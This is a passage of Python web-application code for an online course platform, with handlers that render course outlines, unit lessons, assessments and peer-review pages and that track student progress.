None\n\n\ndef get_unit_and_lesson_id_from_url(handler, url):\n \"\"\"Extracts unit and lesson ids from a URL.\"\"\"\n url_components = urlparse.urlparse(url)\n query_dict = urlparse.parse_qs(url_components.query)\n\n if 'unit' not in query_dict:\n return None, None\n\n unit_id = query_dict['unit'][0]\n\n lesson_id = None\n if 'lesson' in query_dict:\n lesson_id = query_dict['lesson'][0]\n else:\n lesson_id = get_first_lesson(handler, unit_id).lesson_id\n\n return unit_id, lesson_id\n\n\ndef create_readonly_assessment_params(content, answers):\n \"\"\"Creates parameters for a readonly assessment in the view templates.\"\"\"\n assessment_params = {\n 'preamble': content['assessment']['preamble'],\n 'questionsList': content['assessment']['questionsList'],\n 'answers': answers,\n }\n return assessment_params\n\n\ndef filter_assessments_used_within_units(units):\n # Remove assessments that are to be treated as if they were in a unit.\n referenced_assessments = set()\n for unit in units:\n if unit.type == verify.UNIT_TYPE_UNIT:\n if unit.pre_assessment:\n referenced_assessments.add(unit.pre_assessment)\n if unit.post_assessment:\n referenced_assessments.add(unit.post_assessment)\n ret = []\n for unit in list(units):\n if unit.unit_id not in referenced_assessments:\n ret.append(unit)\n return ret\n\n\ndef augment_assessment_units(course, student):\n \"\"\"Adds additional fields to assessment units.\"\"\"\n rp = course.get_reviews_processor()\n\n for unit in course.get_units():\n if unit.type == 'A':\n if unit.needs_human_grader():\n review_steps = rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n review_min_count = unit.workflow.get_review_min_count()\n\n unit.matcher = unit.workflow.get_matcher()\n unit.review_progress = ReviewUtils.get_review_progress(\n review_steps, review_min_count,\n course.get_progress_tracker()\n )\n\n unit.is_submitted = rp.does_submission_exist(\n unit.unit_id, student.get_key())\n\n\ndef is_progress_recorded(handler, student):\n if student.is_transient:\n return False\n if CAN_PERSIST_ACTIVITY_EVENTS:\n return True\n course = handler.get_course()\n units = handler.get_track_matching_student(student)\n for unit in units:\n if unit.manual_progress:\n return True\n for lesson in course.get_lessons(unit.unit_id):\n if lesson.manual_progress:\n return True\n return False\n\n\ndef add_course_outline_to_template(handler, student):\n \"\"\"Adds course outline with all units, lessons, progress to the template.\"\"\"\n _tracker = handler.get_progress_tracker()\n if student and not student.is_transient:\n augment_assessment_units(handler.get_course(), student)\n handler.template_value['course_progress'] = (\n _tracker.get_course_progress(student))\n\n _tuples = []\n units = handler.get_track_matching_student(student)\n units = filter_assessments_used_within_units(units)\n progress = _tracker.get_or_create_progress(\n student) if is_progress_recorded(handler, student) else None\n for _unit in units:\n _lessons = handler.get_lessons(_unit.unit_id)\n _lesson_progress = None\n if progress:\n _lesson_progress = _tracker.get_lesson_progress(\n student, _unit.unit_id, progress=progress)\n pre_assessment = None\n if _unit.pre_assessment:\n pre_assessment = handler.find_unit_by_id(_unit.pre_assessment)\n post_assessment = None\n if _unit.post_assessment:\n post_assessment = handler.find_unit_by_id(_unit.post_assessment)\n\n _tuple = (_unit, _lessons, _lesson_progress,\n pre_assessment, post_assessment)\n _tuples.append(_tuple)\n\n handler.template_value['course_outline'] = _tuples\n handler.template_value['unit_progress'] = _tracker.get_unit_progress(\n student, progress=progress)\n\n\nclass CourseHandler(BaseHandler):\n \"\"\"Handler for generating course page.\"\"\"\n\n @classmethod\n def get_child_routes(cls):\n \"\"\"Add child handlers for REST.\"\"\"\n return [('/rest/events', EventsRESTHandler)]\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n models.MemcacheManager.begin_readonly()\n try:\n user = self.personalize_page_and_get_user()\n if user is None:\n self.redirect(\"/../courses\")\n return\n else:\n student = Student.get_enrolled_student_by_email(user.email().lower())\n profile = StudentProfileDAO.get_profile_by_user_id(\n user.user_id())\n self.template_value['has_global_profile'] = profile is not None\n if not student:\n logging.info(\"Student enrolled using their roseboticsStudent account.\")\n ## Enrolling the student using their roseboticsStudent account ##\n roseboticsStudent = self.template_value['rosebotics_student']\n Student.add_new_student_for_current_user(roseboticsStudent.nickname, None, None, labels=None)\n student = Student.get_enrolled_student_by_email(user.email().lower())\n profile = StudentProfileDAO.get_profile_by_user_id(user.user_id())\n\n if (student.is_transient and\n not self.app_context.get_environ()['course']['browsable']):\n self.redirect('/preview')\n return\n\n # If we are on this page due to visiting the course base URL\n # (and not base url plus \"/course\"), redirect registered students\n # to the last page they were looking at.\n last_location = self.get_redirect_location(student)\n if last_location:\n self.redirect(last_location)\n return\n\n tracker = self.get_progress_tracker()\n units = self.get_track_matching_student(student)\n units = filter_assessments_used_within_units(units)\n self.template_value['units'] = units\n self.template_value['show_registration_page'] = True\n\n if student and not student.is_transient:\n augment_assessment_units(self.get_course(), student)\n self.template_value['course_progress'] = (\n tracker.get_course_progress(student))\n elif user:\n profile = StudentProfileDAO.get_profile_by_user_id(\n user.user_id())\n additional_registration_fields = self.app_context.get_environ(\n )['reg_form']['additional_registration_fields']\n if profile is not None and not additional_registration_fields:\n self.template_value['show_registration_page'] = False\n self.template_value['register_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('register-post'))\n\n self.template_value['transient_student'] = student.is_transient\n self.template_value['progress'] = tracker.get_unit_progress(student)\n course = self.app_context.get_environ()['course']\n self.template_value['video_exists'] = bool(\n 'main_video' in course and\n 'url' in course['main_video'] and\n course['main_video']['url'])\n self.template_value['image_exists'] = bool(\n 'main_image' in course and\n 'url' in course['main_image'] and\n course['main_image']['url'])\n\n self.template_value['is_progress_recorded'] = is_progress_recorded(\n self, student)\n self.template_value['navbar'] = {'course': True}\n finally:\n models.MemcacheManager.end_readonly()\n self.render('course.html')\n\n\nclass UnitHandler(BaseHandler):\n \"\"\"Handler for generating unit page.\"\"\"\n\n class UnitLeftNavElements(object):\n\n def __init__(self, course, unit):\n self._urls = []\n self._index_by_label = {}\n\n if unit.pre_assessment:\n self._index_by_label['assessment.%d' % unit.pre_assessment] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&assessment=%d' % (\n unit.unit_id, unit.pre_assessment))\n\n for lesson in course.get_lessons(unit.unit_id):\n self._index_by_label['lesson.%s' % lesson.lesson_id] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&lesson=%s' % (\n unit.unit_id, lesson.lesson_id))\n\n if lesson.activity and lesson.activity_listed:\n self._index_by_label['activity.%s' % lesson.lesson_id] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&lesson=%s&activity=true' % (\n unit.unit_id, lesson.lesson_id))\n\n if unit.post_assessment:\n self._index_by_label['assessment.%d' % unit.post_assessment] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&assessment=%d' % (\n unit.unit_id, unit.post_assessment))\n\n def get_url_by(self, item_type, item_id, offset):\n index = self._index_by_label['%s.%s' % (item_type, item_id)]\n index += offset\n if index >= 0 and index < len(self._urls):\n return self._urls[index]\n else:\n return None\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n models.MemcacheManager.begin_readonly()\n try:\n student = self.personalize_page_and_get_enrolled(\n supports_transient_student=True)\n if not student:\n return\n\n # Extract incoming args\n unit, lesson, assessment = extract_unit_and_lesson_or_assessment(\n self)\n unit_id = unit.unit_id\n\n # If the unit is not currently available, and the user does not have\n # the permission to see drafts, redirect to the main page.\n available_units = self.get_track_matching_student(student)\n if ((not unit.now_available or unit not in available_units) and\n not courses_module.courses.can_see_drafts(self.app_context)):\n self.redirect('/')\n return\n\n # Set template values for nav bar and page type.\n self.template_value['navbar'] = {'course': True}\n\n # Set template values for a unit and its lesson entities\n self.template_value['unit'] = unit\n self.template_value['unit_id'] = unit.unit_id\n\n # These attributes are needed in order to render questions (with\n # progress indicators) in the lesson body. They are used by the\n # custom component renderers in the assessment_tags module.\n self.student = student\n self.unit_id = unit_id\n\n add_course_outline_to_template(self, student)\n self.template_value['is_progress_recorded'] = is_progress_recorded(\n self, student)\n\n if (unit.show_contents_on_one_page and\n 'confirmation' not in self.request.params):\n self._show_all_contents(student, unit)\n else:\n self._show_single_element(student, unit, lesson, assessment)\n\n self._set_gcb_html_element_class()\n finally:\n models.MemcacheManager.end_readonly()\n self.render('unit.html')\n\n def _set_gcb_html_element_class(self):\n \"\"\"Select conditional CSS to hide parts of the unit page.\"\"\"\n\n # TODO(jorr): Add an integration test for this once, LTI producer and\n # consumer code is completely checked in.\n\n gcb_html_element_class = []\n\n if self.request.get('hide-controls') == 'true':\n gcb_html_element_class.append('hide-controls')\n\n if self.request.get('hide-lesson-title') == 'true':\n gcb_html_element_class.append('hide-lesson-title')\n\n self.template_value['gcb_html_element_class'] = (\n ' '.join(gcb_html_element_class))\n\n def _apply_gcb_tags(self, text):\n return jinja_utils.get_gcb_tags_filter(self)(text)\n\n def _show_all_contents(self, student, unit):\n course = self.get_course()\n display_content = []\n left_nav_elements = UnitHandler.UnitLeftNavElements(\n self.get_course(), unit)\n\n if unit.unit_header:\n display_content.append(self._apply_gcb_tags(unit.unit_header))\n\n if unit.pre_assessment:\n display_content.append(self.get_assessment_display_content(\n student, unit, course.find_unit_by_id(unit.pre_assessment),\n left_nav_elements, {}))\n\n for lesson in course.get_lessons(unit.unit_id):\n self.lesson_id = lesson.lesson_id\n self.lesson_is_scored = lesson.scored\n template_values = copy.copy(self.template_value)\n self.set_lesson_content(student, unit, lesson, left_nav_elements,\n template_values)\n display_content.append(self.render_template_to_html(\n template_values, 'lesson_common.html'))\n del self.lesson_id\n del self.lesson_is_scored\n\n if unit.post_assessment:\n display_content.append(self.get_assessment_display_content(\n student, unit, course.find_unit_by_id(unit.post_assessment),\n left_nav_elements, {}))\n\n if unit.unit_footer:\n display_content.append(self._apply_gcb_tags(unit.unit_footer))\n\n self.template_value['display_content'] = display_content\n\n def _showing_first_element(self, unit, lesson, assessment, is_activity):\n \"\"\"Whether the unit page is showing the first element of a Unit.\"\"\"\n\n # If the unit has a pre-assessment, then that's the first element;\n # we are showing the first element iff we are showing that assessment.\n if unit.pre_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.pre_assessment))\n\n # If there is no pre-assessment, there may be lessons. If there\n # are any lessons, then the first element is the first unit component.\n # Iff we are showing that lesson, we're on the first component.\n unit_lessons = self.get_course().get_lessons(unit.unit_id)\n if unit_lessons:\n if lesson and lesson.lesson_id == unit_lessons[0].lesson_id:\n # If the first lesson has an activity, then we are showing\n # the first element if we are showing the lesson, and not\n # the activity.\n return not is_activity\n return False\n\n # If there is no pre-assessment and no lessons, then the post-assessment\n # is the first element. We are on the first element if we're showing\n # that assessment.\n if unit.post_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.post_assessment))\n\n # If unit has no pre-assessment, no lessons, and no post-assessment,\n # then we're both at the first and last item.\n if (not unit.pre_assessment and\n not unit.post_assessment and\n not unit_lessons):\n return True\n\n return False\n\n def _showing_last_element(self, unit, lesson, assessment, is_activity):\n \"\"\"Whether the unit page is showing the last element of a Unit.\"\"\"\n\n # If the unit has a post-assessment, then that's the last element;\n # we are showing the last element iff we are showing that assessment.\n if unit.post_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.post_assessment))\n\n # If there is no post-assessment, there may be lessons. If there\n # are any lessons, then the last element is the last unit component.\n # Iff we are showing that lesson, we're on the last component.\n unit_lessons = self.get_course().get_lessons(unit.unit_id)\n if unit_lessons:\n if lesson and lesson.lesson_id == unit_lessons[-1].lesson_id:\n # If the lesson has an activity, and we're showing the\n # activity, that's last.\n return is_activity == lesson.has_activity\n return False\n\n # If there is no post-assessment and there are no lessons, then\n # the pre-assessment is the last item in the unit. We are on the\n # last element if we're showing that assessment.\n if unit.pre_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.pre_assessment))\n\n # If unit has no pre-assessment, no lessons, and no post-assessment,\n # then we're both at the first and last item.\n if (not unit.pre_assessment and\n not unit.post_assessment and\n not unit_lessons):\n return True\n\n return False\n\n def _show_single_element(self, student, unit, lesson, assessment):\n # Add markup to page which depends on the kind of content.\n left_nav_elements = UnitHandler.UnitLeftNavElements(\n self.get_course(), unit)\n\n # need 'activity' to be True or False, and not the string 'true' or None\n # pylint: disable-msg=g-explicit-bool-comparison\n is_activity = (self.request.get('activity') != '' or\n '/activity' in self.request.path)\n display_content = []\n if (unit.unit_header and\n self._showing_first_element(unit, lesson, assessment, is_activity)):\n display_content.append(self._apply_gcb_tags(unit.unit_header))\n if assessment:\n if 'confirmation' in self.request.params:\n self.set_confirmation_content(student, unit, assessment,\n left_nav_elements)\n self.template_value['assessment_name'] = (\n self.template_value.get('assessment_name').lower())\n display_content.append(self.render_template_to_html(\n self.template_value, 'test_confirmation_content.html'))\n else:\n display_content.append(self.get_assessment_display_content(\n student, unit, assessment, left_nav_elements,\n self.template_value))\n elif lesson:\n self.lesson_id = lesson.lesson_id\n self.lesson_is_scored = lesson.scored\n if is_activity:\n self.set_activity_content(student, unit, lesson,\n left_nav_elements)\n else:\n self.set_lesson_content(student, unit, lesson,\n left_nav_elements, self.template_value)\n display_content.append(self.render_template_to_html(\n self.template_value, 'lesson_common.html'))\n if (unit.unit_footer and\n self._showing_last_element(unit, lesson, assessment, is_activity)):\n display_content.append(self._apply_gcb_tags(unit.unit_footer))\n self.template_value['display_content'] = display_content\n\n def get_assessment_display_content(self, student, unit, assessment,\n left_nav_elements, template_values):\n template_values['page_type'] = ASSESSMENT_PAGE_TYPE\n template_values['assessment'] = assessment\n template_values['back_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, -1)\n template_values['next_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 1)\n\n assessment_handler = AssessmentHandler()\n assessment_handler.app_context = self.app_context\n assessment_handler.request = self.request\n return assessment_handler.get_assessment_content(\n student, self.get_course(), assessment, as_lesson=True)\n\n def set_confirmation_content(self, student, unit, assessment,\n left_nav_elements):\n course = self.get_course()\n self.template_value['page_type'] = ASSESSMENT_CONFIRMATION_PAGE_TYPE\n self.template_value['unit'] = unit\n self.template_value['assessment'] = assessment\n self.template_value['is_confirmation'] = True\n self.template_value['assessment_name'] = assessment.title\n self.template_value['score'] = (\n course.get_score(student, str(assessment.unit_id)))\n self.template_value['is_last_assessment'] = (\n course.is_last_assessment(assessment))\n self.template_value['overall_score'] = (\n course.get_overall_score(student))\n self.template_value['result'] = course.get_overall_result(student)\n self.template_value['back_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 0)\n self.template_value['next_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 1)\n\n def set_activity_content(self, student, unit, lesson, left_nav_elements):\n self.template_value['page_type'] = ACTIVITY_PAGE_TYPE\n self.template_value['lesson'] = lesson\n self.template_value['lesson_id'] = lesson.lesson_id\n self.template_value['back_button_url'] = left_nav_elements.get_url_by(\n 'activity', lesson.lesson_id, -1)\n self.template_value['next_button_url'] = left_nav_elements.get_url_by(\n 'activity', lesson.lesson_id, 1)\n self.template_value['activity'] = {\n 'title': lesson.activity_title,\n 'activity_script_src': (\n self.get_course().get_activity_filename(unit.unit_id,\n lesson.lesson_id))}\n self.template_value['page_type'] = 'activity'\n self.template_value['title'] = lesson.activity_title\n\n if is_progress_recorded(self, student):\n # Mark this page as accessed. This is done after setting the\n # student progress template value, so that the mark only shows up\n # after the student visits the page for the first time.\n self.get_course().get_progress_tracker().put_activity_accessed(\n student, unit.unit_id, lesson.lesson_id)\n\n def set_lesson_content(self, student, unit, lesson, left_nav_elements,\n template_values):\n template_values['page_type'] = UNIT_PAGE_TYPE\n template_values['lesson'] = lesson\n template_values['lesson_id'] = lesson.lesson_id\n template_values['back_button_url'] = left_nav_elements.get_url_by(\n 'lesson', lesson.lesson_id, -1)\n template_values['next_button_url'] = left_nav_elements.get_url_by(\n 'lesson', lesson.lesson_id, 1)\n template_values['page_type'] = 'unit'\n template_values['title'] = lesson.title\n\n if not lesson.manual_progress and is_progress_recorded(self, student):\n # Mark this page as accessed. This is done after setting the\n # student progress template value, so that the mark only shows up\n # after the student visits the page for the first time.\n self.get_course().get_progress_tracker().put_html_accessed(\n student, unit.unit_id, lesson.lesson_id)\n\n\nclass AssessmentHandler(BaseHandler):\n \"\"\"Handler for generating assessment page.\"\"\"\n\n # pylint: disable-msg=too-many-statements\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled(\n supports_transient_student=True)\n if not student:\n return\n\n # Extract incoming args, binding to self if needed.\n assessment_name = self.request.get('name')\n self.unit_id = assessment_name\n course = self.get_course()\n unit = course.find_unit_by_id(self.unit_id)\n if not unit:\n self.error(404)\n return\n\n # If assessment is used as a pre/post within a unit, go see that view.\n parent_unit = course.get_parent_unit(self.unit_id)\n if parent_unit:\n self.redirect('/unit?unit=%s&assessment=%s' %\n (parent_unit.unit_id, self.unit_id))\n return\n\n # If the assessment is not currently available, and the user does not\n # have the permission to see drafts redirect to the main page.\n if (not unit.now_available and\n not courses_module.courses.can_see_drafts(self.app_context)):\n self.redirect('/')\n return\n\n self.template_value['main_content'] = (\n self.get_assessment_content(student, course, unit, as_lesson=False))\n self.template_value['assessment_name'] = assessment_name\n self.template_value['unit_id'] = self.unit_id\n self.template_value['navbar'] = {'course': True}\n self.render('assessment_page.html')\n\n def get_assessment_content(self, student, course, unit, as_lesson):\n model_version = course.get_assessment_model_version(unit)\n assert model_version in courses.SUPPORTED_ASSESSMENT_MODEL_VERSIONS\n self.template_value['model_version'] = model_version\n\n if model_version == courses.ASSESSMENT_MODEL_VERSION_1_4:\n configure_readonly_view = self.configure_readonly_view_1_4\n configure_active_view = self.configure_active_view_1_4\n get_review_received = self.get_review_received_1_4\n elif model_version == courses.ASSESSMENT_MODEL_VERSION_1_5:\n configure_readonly_view = self.configure_readonly_view_1_5\n configure_active_view = self.configure_active_view_1_5\n get_review_received = self.get_review_received_1_5\n else:\n raise ValueError('Bad assessment model version: %s' % model_version)\n\n self.template_value['unit_id'] = unit.unit_id\n self.template_value['as_lesson'] = as_lesson\n self.template_value['assessment_title'] = unit.title\n self.template_value['assessment_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('assessment-post'))\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n\n self.template_value['grader'] = unit.workflow.get_grader()\n\n readonly_view = False\n due_date_exceeded = False\n submission_contents = None\n review_steps_for = []\n\n submission_due_date = unit.workflow.get_submission_due_date()\n if submission_due_date:\n self.template_value['submission_due_date'] = (\n submission_due_date.strftime(HUMAN_READABLE_DATETIME_FORMAT))\n\n time_now = datetime.datetime.now()\n if time_now > submission_due_date:\n readonly_view = True\n due_date_exceeded = True\n self.template_value['due_date_exceeded'] = True\n\n if course.needs_human_grader(unit) and not student.is_transient:\n self.template_value['matcher'] = unit.workflow.get_matcher()\n\n rp = course.get_reviews_processor()\n review_steps_by = rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n\n # Determine if the student can see others' reviews of his/her work.\n if (ReviewUtils.has_completed_enough_reviews(\n review_steps_by, unit.workflow.get_review_min_count())):\n submission_and_review_steps = (\n rp.get_submission_and_review_steps(\n unit.unit_id, student.get_key()))\n\n if submission_and_review_steps:\n submission_contents = submission_and_review_steps[0]\n review_steps_for = submission_and_review_steps[1]\n\n review_keys_for_student = []\n for review_step in review_steps_for:\n can_show_review = (\n review_step.state == domain.REVIEW_STATE_COMPLETED\n and not review_step.removed\n and review_step.review_key\n )\n\n if can_show_review:\n review_keys_for_student.append(review_step.review_key)\n\n reviews_for_student = rp.get_reviews_by_keys(\n unit.unit_id, review_keys_for_student)\n\n self.template_value['reviews_received'] = [get_review_received(\n unit, review) for review in reviews_for_student]\n else:\n submission_contents = student_work.Submission.get_contents(\n unit.unit_id, student.get_key())\n\n # Determine whether to show the assessment in readonly mode.\n if submission_contents or due_date_exceeded:\n readonly_view = True\n configure_readonly_view(unit, submission_contents)\n\n if not readonly_view:\n if not student.is_transient:\n submission_contents = student_work.Submission.get_contents(\n unit.unit_id, student.get_key())\n configure_active_view(unit, submission_contents)\n\n return self.render_template_to_html(\n self.template_value, 'assessment.html')\n\n def configure_readonly_view_1_4(self, unit, submission_contents):\n self.template_value['readonly_student_assessment'] = (\n create_readonly_assessment_params(\n self.get_course().get_assessment_content(unit),\n StudentWorkUtils.get_answer_list(submission_contents)))\n\n def configure_readonly_view_1_5(self, unit, submission_contents):\n self.template_value['readonly_student_assessment'] = True\n self.template_value['html_content'] = unit.html_content\n self.template_value['html_saved_answers'] = transforms.dumps(\n submission_contents)\n\n def configure_active_view_1_4(self, unit, submission_contents):\n self.template_value['assessment_script_src'] = (\n self.get_course().get_assessment_filename(unit.unit_id))\n if submission_contents:\n # If a previous submission exists, reinstate it.\n self.template_value['saved_answers'] = transforms.dumps(\n StudentWorkUtils.get_answer_list(submission_contents))\n\n def configure_active_view_1_5(self, unit, submission_contents):\n self.template_value['html_content'] = unit.html_content\n self.template_value['html_check_answers'] = unit.html_check_answers\n if submission_contents:\n # If a previous submission exists, reinstate it.\n self.template_value['html_saved_answers'] = transforms.dumps(\n submission_contents)\n\n def get_review_received_1_4(self, unit, review):\n return create_readonly_assessment_params(\n self.get_course().get_review_content(unit),\n StudentWorkUtils.get_answer_list(review))\n\n def get_review_received_1_5(self, unit, review):\n return {\n 'content': unit.html_review_form,\n 'saved_answers': transforms.dumps(review)\n }\n\n\nclass ReviewDashboardHandler(BaseHandler):\n \"\"\"Handler for generating the index of reviews that a student has to do.\"\"\"\n\n def _populate_template(self, course, unit, review_steps):\n \"\"\"Adds variables to the template for the review dashboard.\"\"\"\n self.template_value['assessment_name'] = unit.title\n self.template_value['unit_id'] = unit.unit_id\n\n parent_unit = course.get_parent_unit(unit.unit_id)\n\n if parent_unit is not None:\n self.template_value['back_link'] = 'unit?unit=%s&assessment=%s' % (\n parent_unit.unit_id, unit.unit_id)\n else:\n self.template_value['back_link'] = (\n 'assessment?name=%s' % unit.unit_id)\n\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n self.template_value['review_dashboard_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('review-dashboard-post'))\n\n self.template_value['REVIEW_STATE_COMPLETED'] = (\n domain.REVIEW_STATE_COMPLETED)\n\n self.template_value['review_steps'] = review_steps\n self.template_value['review_min_count'] = (\n unit.workflow.get_review_min_count())\n\n review_due_date = unit.workflow.get_review_due_date()\n if review_due_date:\n self.template_value['review_due_date'] = review_due_date.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n\n time_now = datetime.datetime.now()\n self.template_value['due_date_exceeded'] = (time_now > review_due_date)\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n unit, _ = extract_unit_and_lesson(self)\n if not unit:\n self.error(404)\n return\n\n self.template_value['navbar'] = {'course': True}\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n # Check that the student has submitted the corresponding assignment.\n if not rp.does_submission_exist(unit.unit_id, student.get_key()):\n self.template_value['error_code'] = (\n 'cannot_review_before_submitting_assignment')\n self.render('error.html')\n return\n\n review_steps = rp.get_review_steps_by(unit.unit_id, student.get_key())\n\n self._populate_template(course, unit, review_steps)\n required_review_count = unit.workflow.get_review_min_count()\n\n # The student can request a new submission if:\n # - all his/her current reviews are in Draft/Completed state, and\n # - he/she is not in the state where the required number of reviews\n # has already been requested, but not all of these are completed.\n self.template_value['can_request_new_review'] = (\n len(review_steps) < required_review_count or\n ReviewUtils.has_completed_all_assigned_reviews(review_steps)\n )\n self.render('review_dashboard.html')\n\n def post(self):\n \"\"\"Allows a reviewer to request a new review.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n if not self.assert_xsrf_token_or_fail(\n self.request, 'review-dashboard-post'):\n return\n\n course = self.get_course()\n unit, unused_lesson = extract_unit_and_lesson(self)\n if not unit:\n self.error(404)\n return\n\n rp = course.get_reviews_processor()\n review_steps = rp.get_review_steps_by(unit.unit_id, student.get_key())\n self.template_value['navbar'] = {'course': True}\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n # Check that the student has submitted the corresponding assignment.\n if not rp.does_submission_exist(unit.unit_id, student.get_key()):\n self.template_value['error_code'] = (\n 'cannot_review_before_submitting_assignment')\n self.render('error.html')\n return\n\n # Check that the review due date has not passed.\n time_now = datetime.datetime.now()\n review_due_date = unit.workflow.get_review_due_date()\n if time_now > review_due_date:\n self.template_value['error_code'] = (\n 'cannot_request_review_after_deadline')\n self.render('error.html')\n return\n\n # Check that the student can request a new review.\n review_min_count = unit.workflow.get_review_min_count()\n can_request_new_review = (\n len(review_steps) < review_min_count or\n ReviewUtils.has_completed_all_assigned_reviews(review_steps))\n if not can_request_new_review:\n self.template_value['review_min_count'] = review_min_count\n self.template_value['error_code'] = 'must_complete_more_reviews'\n self.render('error.html')\n return\n\n self.template_value['no_submissions_available'] = True\n\n try:\n review_step_key = rp.get_new_review(unit.unit_id, student.get_key())\n redirect_params = {\n 'key': review_step_key,\n 'unit': unit.unit_id,\n }\n self.redirect('/review?%s' % urllib.urlencode(redirect_params))\n except Exception: # pylint: disable-msg=broad-except\n review_steps = rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n self._populate_template(course, unit, review_steps)\n self.render('review_dashboard.html')\n\n\nclass ReviewHandler(BaseHandler):\n \"\"\"Handler for generating the submission page for individual reviews.\"\"\"\n\n # pylint: disable-msg=too-many-statements\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n unit, unused_lesson = extract_unit_and_lesson(self)\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n review_step_key = self.request.get('key')\n if not unit or not review_step_key:\n self.error(404)\n return\n\n try:\n review_step_key = db.Key(encoded=review_step_key)\n review_step = rp.get_review_steps_by_keys(\n unit.unit_id, [review_step_key])[0]\n except Exception: # pylint: disable-msg=broad-except\n self.error(404)\n return\n\n if not review_step:\n self.error(404)\n return\n\n # Check that the student is allowed to review this submission.\n if not student.has_same_key_as(review_step.reviewer_key):\n self.error(404)\n return\n\n model_version = course.get_assessment_model_version(unit)\n assert model_version in courses.SUPPORTED_ASSESSMENT_MODEL_VERSIONS\n self.template_value['model_version'] = model_version\n\n if model_version == courses.ASSESSMENT_MODEL_VERSION_1_4:\n configure_assessment_view = self.configure_assessment_view_1_4\n configure_readonly_review = self.configure_readonly_review_1_4\n configure_active_review = self.configure_active_review_1_4\n elif model_version == courses.ASSESSMENT_MODEL_VERSION_1_5:\n configure_assessment_view = self.configure_assessment_view_1_5\n configure_readonly_review = self.configure_readonly_review_1_5\n configure_active_review = self.configure_active_review_1_5\n else:\n raise ValueError('Bad assessment model version: %s' % model_version)\n\n self.template_value['navbar'] = {'course': True}\n self.template_value['unit_id'] = unit.unit_id\n self.template_value['key'] = review_step_key\n\n submission_key = review_step.submission_key\n submission_contents = student_work.Submission.get_contents_by_key(\n submission_key)\n\n configure_assessment_view(unit, submission_contents)\n\n review_due_date = unit.workflow.get_review_due_date()\n if review_due_date:\n self.template_value['review_due_date'] = review_due_date.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n\n review_key = review_step.review_key\n rev = rp.get_reviews_by_keys(\n unit.unit_id, [review_key])[0] if review_key else None\n\n time_now = datetime.datetime.now()\n show_readonly_review = (\n review_step.state == domain.REVIEW_STATE_COMPLETED or\n time_now > review_due_date)\n\n self.template_value['due_date_exceeded'] = (time_now > review_due_date)\n\n if show_readonly_review:\n configure_readonly_review(unit, rev)\n else:\n # Populate the review form,\n configure_active_review(unit, rev)\n\n self.template_value['assessment_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('review-post'))\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n\n self.render('review.html')\n\n def configure_assessment_view_1_4(self, unit, submission_contents):\n readonly_student_assessment = create_readonly_assessment_params(\n self.get_course().get_assessment_content(unit),\n StudentWorkUtils.get_answer_list(submission_contents))\n self.template_value[\n 'readonly_student_assessment'] = readonly_student_assessment\n\n def configure_assessment_view_1_5(self, unit, submission_contents):\n self.template_value['html_review_content'] = unit.html_content\n self.template_value['html_reviewee_answers'] = transforms.dumps(\n submission_contents)\n\n def configure_readonly_review_1_4(self, unit, review_contents):\n readonly_review_form = create_readonly_assessment_params(\n self.get_course().get_review_content(unit),\n StudentWorkUtils.get_answer_list(review_contents))\n self.template_value['readonly_review_form'] = readonly_review_form\n\n def configure_readonly_review_1_5(self, unit, review_contents):\n self.template_value['readonly_review_form'] = True\n self.template_value['html_review_form'] = unit.html_review_form\n self.template_value['html_review_answers'] = transforms.dumps(\n review_contents)\n\n def configure_active_review_1_4(self, unit, review_contents):\n self.template_value['assessment_script_src'] = (\n self.get_course().get_review_filename(unit.unit_id))\n saved_answers = (\n StudentWorkUtils.get_answer_list(review_contents)\n if review_contents else [])\n self.template_value['saved_answers'] = transforms.dumps(saved_answers)\n\n def configure_active_review_1_5(self, unit, review_contents):\n self.template_value['html_review_form'] = unit.html_review_form\n self.template_value['html_review_answers'] = transforms.dumps(\n review_contents)\n\n def post(self):\n \"\"\"Handles POST requests, when a reviewer submits a review.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n if not self.assert_xsrf_token_or_fail(self.request, 'review-post'):\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n\n unit_id = self.request.get('unit_id')\n unit = self.find_unit_by_id(unit_id)\n if not unit or not course.needs_human_grader(unit):\n self.error(404)\n return\n\n review_step_key = self.request.get('key')\n if not review_step_key:\n self.error(404)\n return\n\n try:\n review_step_key = db.Key(encoded=review_step_key)\n review_step = rp.get_review_steps_by_keys(\n unit.unit_id, 